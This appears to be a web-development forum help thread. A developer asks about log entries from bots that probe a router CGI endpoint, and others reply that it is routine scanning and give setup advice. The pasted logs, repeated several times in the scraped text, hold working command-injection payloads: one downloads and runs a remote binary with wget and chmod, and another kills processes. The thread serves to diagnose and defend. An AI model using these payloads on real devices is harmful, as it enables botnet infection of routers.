someone trying to hack me?
Answered
Wool sower gall maker posted this in #help-forum
Wool sower gall makerOP
so I'm working on a small project, and I see on my console that someone is trying to make CGI commands on my website?
I don't know what CGI commands can do, but according to Google, it could be bad, also from time to time, the command that they try to do is different from time to time, like some times I can see the IP of who tries to "hack" me,
the startup command I use: "next dev"
the log I get sometimes: "
((id>`for proc_dir in /proc/[0-9]*; do pid=${proc_dir##*/}; buffer=$(cat "/proc/$pid/maps"); if [ "${#buffer}" -gt 1 ]; then if [ "${buffer#*"/lib/"}" = "$buffer" ] && [ "${buffer#*"telnetdbot"}" = "$buffer" ]; then kill -9 "$pid"; fi; fi; done`))
another log that i saw, and that one had an ip innit: "
('country': $(id> `cd /tmp; rm -rf shk; wget http:// i removed the ip/shk; chmod 777 shk; ./shk tplink; rm -rf shk`))
and yes the port for the website is open. (how bad is that?)
does anyone know what I can do in this situation?
I don't know what CGI commands can do, but according to Google, it could be bad, also from time to time, the command that they try to do is different from time to time, like some times I can see the IP of who tries to "hack" me,
the startup command I use: "next dev"
the log I get sometimes: "
○ Compiling /_not-found ...
✓ Compiled /_not-found in 3.9s (471 modules)
GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) 404 in 4066ms((id>`for proc_dir in /proc/[0-9]*; do pid=${proc_dir##*/}; buffer=$(cat "/proc/$pid/maps"); if [ "${#buffer}" -gt 1 ]; then if [ "${buffer#*"/lib/"}" = "$buffer" ] && [ "${buffer#*"telnetdbot"}" = "$buffer" ]; then kill -9 "$pid"; fi; fi; done`))
another log that i saw, and that one had an ip innit: "
GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F*i removed the ip*%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) 404 in 57ms('country': $(id> `cd /tmp; rm -rf shk; wget http:// i removed the ip/shk; chmod 777 shk; ./shk tplink; rm -rf shk`))
and yes the port for the website is open. (how bad is that?)
does anyone know what I can do in this situation?
Answered by joulev
firstly, don't worry, you are not getting hacked.
now onto the how did they do this. most likely, they are on the same network as yourself, know your local IP address and simply go to, say,
(i'm assuming you are developing your app, so you use
now onto the how did they do this. most likely, they are on the same network as yourself, know your local IP address and simply go to, say,
<your-ip-address>:3000/cgi-bin/.... it's quite simple as long as they are in the same network and know your local IP.(i'm assuming you are developing your app, so you use
next dev. don't deploy your app with next dev, you should be using next start instead.)9 Replies
American Chinchilla
Call the fbi or police.
@Wool sower gall maker
Jokes aside, did you deploy to vercel?
If you did you can block by user agent
And set up two factor connection to prevent spam.
@Wool sower gall maker so I'm working on a small project, and I see on my console that someone is trying to make CGI commands on my website?
I don't know what CGI commands can do, but according to Google, it could be bad, also from time to time, the command that they try to do is different from time to time, like some times I can see the IP of who tries to "hack" me,
the startup command I use: "next dev"
the log I get sometimes: "○ Compiling /_not-found ...
✓ Compiled /_not-found in 3.9s (471 modules)
GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) 404 in 4066ms"
((id>\`for proc_dir in /proc/[0-9]\*; do pid=${proc_dir##\*/}; buffer=$(cat "/proc/$pid/maps"); if [ "${#buffer}" -gt 1 ]; then if [ "${buffer#\*"/lib/"}" = "$buffer" ] && [ "${buffer#\*"telnetdbot"}" = "$buffer" ]; then kill -9 "$pid"; fi; fi; done\`))
another log that i saw, and that one had an ip innit: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F*i removed the ip*%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) 404 in 57ms"
('country': $(id> \`cd /tmp; rm -rf shk; wget http:// *i removed the ip*/shk; chmod 777 shk; ./shk tplink; rm -rf shk`))
and yes the port for the website is open. (*how bad is that?*)
does anyone know what I can do in this situation?
firstly, don't worry, you are not getting hacked.
now onto the how did they do this. most likely, they are on the same network as yourself, know your local IP address and simply go to, say,
(i'm assuming you are developing your app, so you use
now onto the how did they do this. most likely, they are on the same network as yourself, know your local IP address and simply go to, say,
<your-ip-address>:3000/cgi-bin/.... it's quite simple as long as they are in the same network and know your local IP.(i'm assuming you are developing your app, so you use
next dev. don't deploy your app with next dev, you should be using next start instead.)Answer
Wool sower gall makerOP
mhm, I understand now, I do notice how stupid I was,
I was working on my app, and I used to view the app through my public IP, now that I'm looking at it, it's really a BAD idea to do that,
I'm gonna switch to localhost instead of my public IP,
I'll also note that I need to use "next start" in production instead of "next dev".
thanks for the help!
I was working on my app, and I used to view the app through my public IP, now that I'm looking at it, it's really a BAD idea to do that,
I'm gonna switch to localhost instead of my public IP,
I'll also note that I need to use "next start" in production instead of "next dev".
thanks for the help!
I also get these logs on my production server, I think this is some sort of bot that keeps trying to find a vuln on public Ips
Wool sower gall makerOP
well yeah, that could be.